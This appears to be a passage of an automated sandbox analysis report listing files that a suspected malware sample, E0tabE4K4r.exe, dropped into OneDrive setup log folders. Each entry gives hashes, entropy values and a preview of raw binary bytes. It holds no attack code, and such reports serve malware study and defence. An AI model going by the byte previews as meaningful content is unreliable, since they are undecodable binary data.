                                                                                                                                                  Preview:EBFGO..2.d..|....A.f..@&...)!.p...^i.,n.`.3.KG.4*.%.!.^c.E..i.x.b..#3+]k...`:..m.Bf:........RquQU....qX...5"G'..,.E`I...(t.N../&...l......N..W;..{.Mt...]..P.{}+.....s. .|...".........{.''.S^.....B....5d.W!../'..K....9....k:H..-rcn.&b..-s..jgU...8..~.k............).0..-E2>.s............-3...|8~..Q\......xu..+}/..v.-...^..."u.....+..}7DfG...0.h?.._{v..pfw.=.Z....!....G.........^......Oo.f.......T.V..},.$!?3)T......e.Y..~.SZ...#r.B...G.9....M.. ....r.?........,{fV]c....GF.x}..lc.3....qp.t..~.....x8.v...x...J.....k]....r<.tF...?..;...o..:R..e^J0S...}.....J.......s..`.D..gA.r.<a..N....efu..(.k...M..E.Y.|...P.3K.... ..3...C!.W..fd"....=...D.....K..V...>p....s."y!/`.M.vVa>..1.[.&.uLZ....g.V....=..c......r.u.....,.6m...J+.?...V:...T../..&./.........E.....X.....c.}h....Z...G..x...../.SZu.[.P.j[.x.,.d...j8f...[.)..\3....:\.F.IN.J.._7F.x.C.a.h.z..N...!..EX..T.B.$.zN....l.....w..I.......e.......'....X.;..h2.P...y...t...PP.v.G-..U.T..|..a..6....E.S....o

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-2023-10-05.1104.6292.1.odl

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):65536
                                                                                                                                                  Entropy (8bit):1.5615464590679304
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:jI+oRPtpv9oc0pv/cdR1c5W6LaaKHH7m6XxBvlhfvQDM:cP7v9ocQv/MR1B6OtHz3lE
                                                                                                                                                  MD5:0521B9AB6FC70E542025ABEB0C86A88B
                                                                                                                                                  SHA1:3675160BC4810A403CAA7A511AF01DF8A8936638
                                                                                                                                                  SHA-256:67BAAD9EF35D55B37BF7779C33D4A66050D18D9856C604DD47E68C1EEE0DFFE5
                                                                                                                                                  SHA-512:E3F47BFB767EE3908B728645F4F49980D2C9058757A0D40BBF3027A52794DE1ACFC68C2C87422E4F904616270AF3F1AD23EAD6AF4809A193199CDB9C37E7AC13
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:EBFGO.V.m8u...x+j..(TR.P0.>8....lR-T.....|[.lX.<...................RS{ ..3{.C.$.......CS.d.......B..4D.......yA......E....J_W.\..@&G1U.P....9M..J.; ..5.y1..b.....A.t..d.D..^ .@IC.W.#.pDR.f..u..@*...C..ut..Z......c.:E...F0P.....y!.J\.C.#(....\$..bvX+.e.3fp.r.........s.L.J..B...u..E....GJ/...N....R.#!{..Cx+Z.N.].V[._{.|k."..n......N.-.2.O.,..!?.......w....>}.U..c9,.nx3.Odz....j.B.B..K..T+.^x<.8z.Qw..$Qi....e...T.(k....5@b..:.Sr.=9..)!$...>i...qjS....yl.v..%%..6d?0j.Y.F...yz(.M.-..c..m.4(..r..`...|...2sV.8....5..>...i}...6...@N..).~C...QAY..B.z....?*]z..X.i.r....kZ.....].8Dk..i...Z.b1^..(1......5o.u.....`gX*...%...C...}..Q.z..,.}b.$(.'.8.%.X\.sD..C..[.5%|p.}..d.7C..`...M...h....\3...D..x...8i..e.K.#...KU..=..._[..e.&..gp......i....*.....urt#..9.x#....v..R...\..]cv+D.Q...?.C27o...pGy.....A~....~....J...Z..gA.yA.%L.u.~...{.L....u.!...\.@....K......%...?...Ux....nW..1QV...x..2.j...x.yE....>..C.#a...P...ub8..I....D.m?(a..i..;.B....i>m.E\..1.x...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerMachine-2023-10-05.1104.4368.1.aodl

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):65536
                                                                                                                                                  Entropy (8bit):0.8654151124939585
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:yJR/IromV/HD8qyei5FxsKduwdmIfAxKyceg7/:yJR/ovQUmz7uwII4xKeg7
                                                                                                                                                  MD5:4598EBE66C7F65CFB436C1377BC5BDD8
                                                                                                                                                  SHA1:C716C8DD8A6A07053B328EB0D768FC811C256721
                                                                                                                                                  SHA-256:1F17B88D5442A62A694178AF3BBD12A9F7D6B4FC9971D068031F2166F62D78EC
                                                                                                                                                  SHA-512:BC7619E7649E42DB0DEFEF82DC42BBEAEB558C797BE8CFC303BC8B0571F553889996A5A1A5F61BC02EF75B3F9497BB5B9AB5F8482A715674C17E41AB4E510552
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:EBFGO..@.g.54m.....Bk.[.$a4...6Q...[..MX..J..6.P..+..j...a`...9..D..U..m|..w...>I.W...tD..vS..~E.`....R.s.5....`)......f].SR5..z9..w.)!...$...n..wD...>..UQ.<m...I.....^*..I.S..1Vm.[)..,fq.4.m.?..C.....AL. ..k..<n.].gI.X+..|.....y......B.3D.).../.\.....N.....PI"....{Lv A.I.[...S..kf.=A]e.\=...D.F2H.v...M.....efX.(.W.A.....g.@m.IYl.....z.>.].O.&..7E..Ms...6Y.9..K..w..W..:...Un,......Yz...`.... F.^c.n9.&.7.>t..%M.F.....#e..}ZW.N%.P.X....C/.#..X.-.b...c.1I5.l..t&.fV..1ey.?7.,/.I..]C;;v.>....Nn.ZO.1.S|.|..!T.....@"&,... j...Z".b..~...j.a..A..h.".~........ .`.&......j.$.Xr. u..bOr....?..U...9U.D...j.Y.(..a..P.3.>...N...&`.X.S.<.-...,....n9.+.pm.}w6.....<P.7..Q..1....w..'.*...)>..Yww.^.3n...`.`(..tV...8%....pL...............)............Ck....(....[...b....#....i..H...fO[P .P.<.&.....#....^.....f.|*...,*x..MGl.u].'z-).2..!."....p.V .Pzv.T2Gj....'jX.Z..p.h....O..e;.@.....U....j.....dA....&.e.3}........T*S_.M83Z.]D...J.C".J.hm.w..D/uzf.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerMachine-2023-10-05.1104.4368.1.odl

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):65536
                                                                                                                                                  Entropy (8bit):0.20663451057020055
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:mYWr/+tws1q3HeR7NVQLl9WVB0IOP6PPRK8+2bz:mY0/+tp1q3HoJajWVB1cupKQz
                                                                                                                                                  MD5:6C5EF9F97A16C57928FBB91BA4B4DED7
                                                                                                                                                  SHA1:9F9B50687082131E961B23048F90599365FE2867
                                                                                                                                                  SHA-256:CB754FC52A0486380AAA1801DA0BFD438198CCF89AC29B7BC47C4383356714CB
                                                                                                                                                  SHA-512:4709D22FF6AB7BD7E6DDD5338CA9DE46CE8A0CCA37D56183C3C1449DBE627AF9785BB7D0C6A062117FA55F26D2D07A90D6742371D44C5FB931DBE960EEE09F0D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:EBFGO..N......u<..@.^<T.......o..j......0....)`.....I...*.H.p...._E...-..`.4..[.....R.CIh.(.e...A.."?....~.Z..N$+.1...y.....&y...Ul....o...#.....@.;.?......A...,.3$.94..S.n%=m.jS.v..-.?.?y.N.F......rM...1...@a\.Y..hn..:I.!....C..-.^"..9[-N.O...Hq)6g.E.J...s..#s.2.)R.$c...........B.7..2z.Q.....{g...f.bL..!.aE.}..,e.y...f-.E..%.....KI^.u.4....V...!.3_.....K...dGV.80,...oF...t.m.lhDs^.c$..z.4...-.s.LF../.....M.\.R..+.j.....x.%......6...-..ZM...5........`X.......r<..(..:(.u.#.O..$.,...j.U..V!N.h...MN.;..*.I.. %.....L...D..`I............>..k..".H.......e.^.%.....;........?JS.....M.m/...7.H.l.....'u...~vE....w.I.6H.R.5...t`...l..*UC.&RZ$d.....3.......?\n.W.1......)....Z`...i4.......t..1.z.........T..M.>gT.<..!...t..^...to.K??..p4.T......Q.c2{.:...h.l..w.o......mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}........................................................................................................................

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerMachine_2023-10-05_110457_1110-1a44.log

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):65536
                                                                                                                                                  Entropy (8bit):3.4562151211972005
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:njlJNi92pjS3YyJRG4B39Ev2cZUlopaRlSaK5l413NIlBX8gSnu9ZKfe3b:j9i92tMF3p4hZsKUld44136legSidb
                                                                                                                                                  MD5:3327150F5F23C0CE2825544DB6564FBC
                                                                                                                                                  SHA1:71FEC3C60841CF089A17C9E0802BACA7AC2D983E
                                                                                                                                                  SHA-256:2100B76E587AEF6BC8AEE4D5BA9F4FFAFD90267C876D5480D36565F1CF375842
                                                                                                                                                  SHA-512:AA17EB2FDEC658DF33503C419CF51960FD5FB7ABB0932A6512ECAC49326D9BE74F602149A5687E44C0AD2C6D0CD9068269D2F84C8629397CEF635FF8C5F5F148
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:1.0./.Vq..5.|}E7.....o.nH#N.....;....*...I.........`...k..#d..n#..q...D..+........G..........Q7y..g......U...W.2.[XN*P.N.j.....EMc..#^.X.Z..S_....`J".-..C.?..L#.... ....>...".s..G..}l.. ..K..yHp..s.k.,hTP...)..C..w.9o.+......F.M........,%Fz^"..<..s#B..."...L..T...c..3(._..Y.......J.>la.v..x....w.G....|ZW...&......M.3.....l..._.ym.a#..l......%.....,.u..*\g3.n...6......E........_...z.a.+X.T4..f..P..}a&aP+T.<.F....Bk.Ws.T.4...O<...:...v.....Td....f.s..*.4.e0...1...z..J/S..]Jw....%.r...u....8......&:..W.W.n.V..g..T."..p..+....T..N..iq.U.....wc.N....AC.nQy..A...&..h.......\(f...<..Aj.=....*..U?m....OQS..L.{.H4....&.....p.`q.G....cv...#.h..g...9x....I...)Y...Aa.c.....M...UI..!3.1;.h.vy....l...;......k....D...[.. .@,..s.)..e`.Rr.}.~,.h..Y.a".x..q2...].p.....ZV?{......T4.5.......8.0R\........!$..,....'4.Hu.%.,[...U..5C....3..e.-..$R.%.("}.v.yv\}.1..k..K-p.gS=.E......hL.j..Z...8L..M..........J...%...Au..a.3....N.}e...w.....p.W.:...Q.Sd

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerUser-2023-10-05.1104.6556.1.aodl

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):65536
                                                                                                                                                  Entropy (8bit):0.9407896509594935
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:TQWlY1CkuQ6jxbuviIXDweynwAl0890HyJu46TOC/vDV5MkC2h2:0OeqFbiUZlLuF4gOC/vDV5MkC2h
                                                                                                                                                  MD5:46FE0464EAAAC158FFC68A3EF078F7EC
                                                                                                                                                  SHA1:EF169FE070787273230AA4730E337975A757851D
                                                                                                                                                  SHA-256:B36AC4705975DFCDD66D59E68C9202B793BB98305CEBE2E0153393CEA42BD20B
                                                                                                                                                  SHA-512:C4AC23DA0810979E02D3D227C7B04AF277FF2F4FCD27A19BF1DAF88DA77A654AC4B7167A1FFAB6F84FC34D2114A269AD56DF2A1DE011491CA6200998D597C5C6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:EBFGO.G.P.y.....,i.\j.+1.....v%..:..;.r.!.....wO.@.i.sa.G.T....|/r~p....a#...8I(.8/s9&.(....L.o.F........8...$,\.`...J.z:X..~^....V...|....w..;..E.|.I..P....Z..a@.."Q..[O.F....|6.f.,....^.h\h...d#.#M.8(La.l..<E..h\....K.g.....Y..7...g.h/.^;.r...e.&.I...x.93Ew..Z]......h=Ps.,.....z......Hj.'q..+m] o....,*R.l.A9....._^*..q.......b......W.HlD._.9$.1.....W.`.I..k.5.I(............]....'[Gn./54.K.*-...fzr..~^.....G.C.........'...h.{@...O}....X0{O..!..h..|.Qc.zZ.#U@y8...k.z<.f....(.......y.A,....#...s.....;......J.rhF.i........a1z.e../....."O.;.'..CGw..!....3..RR2...N..'........I~vk.t.W.2..@.l.....4.m.:......&...../.z)`o...x..e.........cL%.P..la...*E..9alc..6K...(.....?....>.\..{.TV.....3.^...B9)....T..`:..V..11..#.iy......S.l.m|.C....6..|...|j,7C.u.d....!.4.....+6...@..N..:Trpmy.....z..:}.-..3......;_0....Y.....`.D....[...M.m...i...|.2..b...=.7P....t.l.pqME..y..~r.@s.........X.=..!c+VE../9.6..m..|x..2...x....r#.d...A...g....)...sq.c..4q..o..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerUser-2023-10-05.1104.6556.1.odl

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):65536
                                                                                                                                                  Entropy (8bit):0.2059987237339822
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:zSuTEOh+/O3uSiC56+OZ5yTWeHcNTzET2bz:2yVY/O3dN5+X6We8tTz
                                                                                                                                                  MD5:396F1B9357E1C1300E947C2C5771023C
                                                                                                                                                  SHA1:05377F1DFD3AED2FB6F79A23C8EB30C18F104C1B
                                                                                                                                                  SHA-256:C5CA293B31DFE6B19FE6B45AB24B3ACCD5A773EF5ECC0BAAC779CA3E5043CF81
                                                                                                                                                  SHA-512:1CF6D2F8DE49B0ABC6BA8C151ECFE1B4118EB6A96B394D86EE9F734CD5655F3ABB268466457E8565674A043DE5AE30BB20E723D50160F7ED6A65C7B0E82EC178
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:EBFGO...Rz.d...5b....A..p*.fA."*.M....Z)W17.ba.pRA.0.f...].F..q....5K.B+..z.x...K..H5D..e.H.d..!...d..:.4.e.V.T)...K...Q-+e...............:.isT].E.M...[....#.1...v'-.l...V.3._.....V..i.....{...-0?5..]..S...........=s)`I..9.Y...jv....e'.....O.....z..)..i=.=}..;.?...Q$...j7......a........ ...{.rti?Ps.'..E.......V.>..:Y...V..x>.........../....&..(...o....S~../..T....B.Nj..i"}f.^(..B.5.N.H.H.gre..r.h...(.}...{ 1....A......E..{=i..E...+...._yfITr..L-.....k...<...^...2G.N.Xi.S....9.....R....Z\._(}4.`...f._....W...h......|K...JGo.d..&...i$..Z..e.W ...<Y.....Z...1..r......o.Kqj......[M..l..0.J..4s.s..y......+e./..W.=....._...B.{S........v..:=.8.o.@..4.....K.N...ai...,....BQ.|U3@.6`....'..|._.M.1.^Zt.y..........+."q>....(:.......T.T$o.Y.+....%.t...z*\&N.L.guj.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}........................................................................................................................

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerUser_2023-10-05_110457_199c-19b0.log

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):65536
                                                                                                                                                  Entropy (8bit):3.8962498214026824
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:768:O83rmS5nqQWTYTMg0kZdeDWNGU/rz5XyjM1he:OO5nq21acT1M
                                                                                                                                                  MD5:DB9723CEBAB425CC60FF41855A1A12D2
                                                                                                                                                  SHA1:7061467B63B54E5B0E2E296CC660110C534A6634
                                                                                                                                                  SHA-256:2BEECE1A6F9F6D5D26F52DF765EB2680631C7E7850CC33448A28B3F12BA1249B
                                                                                                                                                  SHA-512:3FA79A68DA44481854D530D6BA97347BAA0D5613AF23B76AF7B8B8EFE877D37AE1137C88F0B217ED49B817D54D55A38EAEF79B47C1FD64293D4C2C1A32C58948
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:1.0./....).\.B.\.@..Q..H.gr...../...^.....|......."...O..$.nq...j.....p.t....P1..S..@Y..D...K.C...K..NE3....{...=F...nS..+..4..+$.k.&]J....-......Vy..@.F.].R S@...?T8...1..o.v......v^_.~...F.K..K*.......|..u........9.k&5.By.T!..&O.?.....e=GnT..2k.$#*$...m..|...|....{.Z.;+..|.....0GQ..l....id~...D....~.Y...+n^.Rg...X9.....-.....^..z.........>T...a.P...aOp...!.D.mx7........|6L..NaqKa.H3.l...@O..*..../5....+..L(!...Y.N..c...fE;$.7..s..z.%...e.r.u.s.5...m|..Q...s...o\"K|......8.......ai.......[.Z\.cs.k..|Z!k;......=.......[..hD..$.M.v...A..O1.gw.x.+....tK.....N.T.S........-.#.k....)..._...,....R...u0.Rx.a...d..e.Y.M....b.I.=....n......Hq...),.c..+.z.k@_.y.|}..w..s.!3..-V/.[.c.,...WR..S@E."8.8.]...>&H....T..N..Tn2..:LL<.........-..R.E9.Z..f.K...~=..|&..I..v E<\.$.~#Z.}..6.Z.H}..3Y....~..$|hLC...T...f.`@....}k.R^3....).,6&..?..d.....H:..JZZ...!s(A%.Xrz.j.....;.3.....UM.@..N.-@"..i.....Bz..:...;T..@.D....ZF...Ew~.............?t..7....a...:...[.n....a

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall_2023-10-05_110450_1894-1898.log

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):65536
                                                                                                                                                  Entropy (8bit):4.414861828213841
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:768:1NkOd1GlqtOfdPpzg/4rPIB6yJ5pAkNjazj:1Nkm1G8cPpzgwrBypha
                                                                                                                                                  MD5:55E49B9418C9D9BCC461206400B87606
                                                                                                                                                  SHA1:7DF254695267A7DF5C1905379ABD9182F6B50197
                                                                                                                                                  SHA-256:D5D81BAE93F5FCFF0321B596C225CC31E2FCDA0CE2F2D7CAF4FBDB772AE149F7
                                                                                                                                                  SHA-512:BC95C5C6BA97FCE13E539705B56C0024A7D761FC4B15AB8CDEFFFD6775EEDB2663FB7B3B493C5DB52597030F51E894F623917333A7287C4A0A81902B640D0524
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:1.0./ ..t.+.9#....Iy.....#......O..t........qyc*.~...@N.....s...&N.._.n.(JI...9..c....i.w...5D...O..B.~vsxkM..HCRQ.!k..z.u.I.Iv-jH...k...7";T.].A.Zfi.&X..eN..FrPH.4.(.....c4}..[......)..A...])...x.T.K....\.K..$@...l..$..<"r..._...LO....G=..]..6#4E...!;:l. |GG.TWG`..N....i...l.....c6.......%|d# ..z...?.`...s.....f.d-owUP.....HN.k...q.3...E.e.=J...x......U{..Z......).H..n+........&`V..*d>.zAF..qa.*Ko..!...+..C5..H...i4.#N...{f.W;....[&.......u6......Y..:`..yvS.!h...D..G..Y...f(c.d.<}....2..A.?C..O....3....V...g.....FA!.W...A!K_.=...v.. 'l.U[pN..Y*..=(.J..K....T.....A......C..u_.....1HnI$...>[k.V..h.....k.%%..Xz2%.}..3.4..d5..p..0I......>...X=\.@...>.U)....9$8...%s..ULO....Qq.H.d.M.j?.21D......N..ZG.m.\.8`.I......_H<{.M.h.......7....{sw*Aw..d..C..T.=..7"D.7@.k...G_k......l...Rx`.o3r..JQ...HFW\...........}....2Q.O..!:-8......Y..=.=....9..]`..P.q8......(.PO.!....C.&......xb.$...8k..V..<..M..b....1^D..............W.Y!l.....1..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-05_105651_1814-7e0.log

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):65536
                                                                                                                                                  Entropy (8bit):4.566246811712283
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:768:V6T0Fc2wfSJvvtya/Tj+voJv/hwUCkEOe45b7Q85X6x:V6OfIK1yaLj+voDwRP4VQmX6x
                                                                                                                                                  MD5:D471DF1C20160798835ABADC125A8D27
                                                                                                                                                  SHA1:E9E717D493290C9E0CA920B7DAB242E6B08A64AF
                                                                                                                                                  SHA-256:4A05B8EC85E576B930E4D2958B5DBF29290FCECEDFCFD4E70E0547EE3EFA295B
                                                                                                                                                  SHA-512:35517E473B08CDBB2324A88CB9362E7926339E00D8383D5ECE198D5A36CC349BC223EF032E13A8D9D87D9839D502D67523AA1047D4FEF0E3494A3B93ABE07824
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:1.0./|......}.i..C........u..F............6.l'..t.@.Q..d.o..P....-.J.#.....f\..*}..W..-...{)$....._.{A.....m.-.^..l.. J.<Z.q..X..".K.YJ.2..........;...d.]V .,..>+.L..E.]n....r&R.`..o.SM.Q..1....5`.......Ne.~.....-....S.T....B..Q.....F.e..~.`....T.q..f...c...^.P.V...X...1..@..>...S`2._.v.:h.......f[..z..........l...I0...e..b...#`:.7I.....a.v.....T.8.f...3.[.D...~yy.."..'A.]........HW....I.F..b.mQ.V....V.p......Ubf.-.|..8.v.\..3.fl7..I.[.i?.{^.d`.+..M.`.H_.F.ZB.m......E. g.kh.Y?.....V.t..KE.........5=Cw2.Z.8ve...v`..)?..}xUo..........<V.W./*..8-...#.....)<..s.]...FH{.?..s... .....g.@..R*..../((M2>.4.....E4x.....^..,\.qg.Y.vM2.b...N..v....k....\ .1......:&XBI.s~.>V.....F....IR...z...........9....K..X.\...O...EId h|...#...)..........K..u~...S.Zz..>G@..mL..G. o.Y....."."G.........6J..D....v..Zk...4...i8....4.5.Hi.I@.H.){."..\q..-.M..?...Fk`.`.G.nk..a0......?l..m.Zrh.....5.*.P..g~..4....X*7.M....<.P.;..k..;M..H`..u...OY<I.U.9.-.....Y...i.3v.xX..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-05_105731_9604-636.log

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):65536
                                                                                                                                                  Entropy (8bit):1.3138543731785552
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:GrOTY0vi2Je8YbPJchSapnFQOTvh9KqY+36kS3MxlX6pjh:GyTY0viZJkjTp9D36zcxlXKjh
                                                                                                                                                  MD5:1091B50D4A2CD54ED68EAAA6DDC92EB5
                                                                                                                                                  SHA1:04EE41D305CA736B49BC6FF002925944E3991D36
                                                                                                                                                  SHA-256:F875AE87873B7FCDBD6CACE6039E362F9EEE7070D7FC94CBE8A39C567DF5B4AC
                                                                                                                                                  SHA-512:9475B81C416A1B9AA179C74EA44460C9814BD77A10229855713CC4021648684C8780CC792144E51C17D702FE3F66DA4A48428ADE5BAC6701EA16C753DC299FD5
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:1.0./H..H..oGp.V.....TT^D.c.....:.j......n......k&...a.....v.k.z+X.$..I>1a..Q...O.......Y.5sD...'...@.8...OMC.&r.j4..........eY..<^.T..S..~.'.>..R...q..XQ...a6.v.......]lw- ..W....6...xK......~!.H...Y;.?Y\o>4.Jr.'^......'..g.....6.KV.A8...DB-..H.+.p..s.5%W....G.^...".F$BG%1...X...(w._..p.U..zb}.%S.....,.......~.O....*....C...."8..b.u=.57H.._n.C...$}....]rjb..H.......A?...e4......1.>....%)FTf..7/P...{..C..t........B8.4*?>)....Y!N.....m%..K.B(.#......b@8.....+...a?....`.....-.yWh........2ZAl....].r.l......Xc........l... f.R.X...Gm.....t.."...1..q.K8.Nr{..J!...B....q".P.....a_..Y.5._}.....e...R.l....G......9....l..y;...1...W.J...p...v........z...A....*6......j.._D..|...*.;zMKt...6..%!{NYz..%@&...T....-.Jd.S...cUk..Lk[#.<.:.j.....~...-\E..b..LE.:kl.i..'[.....pI..6k.8.)).[..g.[...T&...R.V......%..\...%B8/y=.^......1H.u....l..I.v.Y.O/k.}.....r.........L..R...=..P......5...b..u..n.o.pI...(.<J.R..?E.L)...;..n(`@..<..Zy.....c-...sb.A

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-05_110505_7768-7772.log

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):65536
                                                                                                                                                  Entropy (8bit):2.761354285313203
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:JTjjvnT+2E8PwIqABdJe9i0Prb0+CO6cqvqZQuB:djjvT+OPw3AB/sPH0+CRSZQuB
                                                                                                                                                  MD5:907B2AC97DA6125FC84B94A287CD3136
                                                                                                                                                  SHA1:EA5967E0C79EB58BBB3E48D7C39E7331E14416FE
                                                                                                                                                  SHA-256:03B2910FDD574570A39AA111C138E1208C56DDB0E96DD52F0F74898D2D9DBEC9
                                                                                                                                                  SHA-512:65B9A9C69F5FDA0E1339AE8A5B6859FF9D8CC098A9C257B1AA961992E8034E4CE35F9248C3F1B4E5B0719CA504DFD0FA26EC33C6DF504B81D31C0A8D8DE11766
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:1.0./d.......8.c./n~....Q>..V.....#%.D.s.X.n...].r..3g#.p"....P.x...^.."....A9."...2...ft..|.s.y..1'iL\k.I.=`V,..LFT..n.Q.v.....)3.4.......1D.....c.R.np.......H#.~.lz..y....!....~q....M..Q&|...4..t..9..qK.X'...`.e%.w.......K.!.._....;iXR....6gd..*.X.2..W.....!P...........U..mV...P.O);.4..D.......;...V...........l.=._k.l..@.<...1...q..bd.."...D9..#.~.Ru ...t.eP.^..OD.. .:%..G..........<y=.,.."....>....;.mW..^..q.~~...*.pE.&...........x%d...P.. ..=..!.....$..=.rN...T..}.B..,.T.D9w..U9,...iHz....w....3*lt...6.k.>.M8.......~Y...Z.R5....6...5L..4.g.g...`S...=...8D9...@ .`.wYcv....%..u.. ...-.$..S..'.I..2..7\....F...j..$..%F..z`2....Xe....H....iXI......!q_I&6..a..a.O....Pu7......6z.....}v3.>..<...........[L<..8.,....n.....7.Zo.9.K.Xy....&n...~/..ZU.-r..F.s.........!6.AC.^.?..3..(..M.#...<5...W...T.H.....I..Y..*v#S.0...;.z$!r..k^-M.|L.u.k#"..H..S..s...'h....yN..k....W..7.}..x.<.^...1.B.F.7hE).....Wvr..jq3k...~....g....&...>.s.q.K%,L...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-05_110612_6208-6212.log

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):65536
                                                                                                                                                  Entropy (8bit):1.0052165840995626
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:z50E12xFxTSJuV2EUBFPmixJbG0AITsjL/gMK7i3oFTCictFBvpCjbPX:zox2zuixJC0A9L/gMK7fF+iczBvpib
                                                                                                                                                  MD5:CEA6634D54F1ED34EA3DDB7CE85DD28A
                                                                                                                                                  SHA1:F1AEA50E184EF1B6D4C8B5A33727FC3D1D7F3BDE
                                                                                                                                                  SHA-256:3C203E7E43A77D3D6269E81C03C79F9EC3E1EED177D2B64C8F85E30E8897B6C1
                                                                                                                                                  SHA-512:33096E86DE79D9644E56A2C9BD37A745240B622CB9485986CD26FC13DBAFFB896425D5BFB630249D82031FE69E469053DAC509C9FE9458DC66CC1CB16FB90326
                                                                                                                                                  Malicious:false
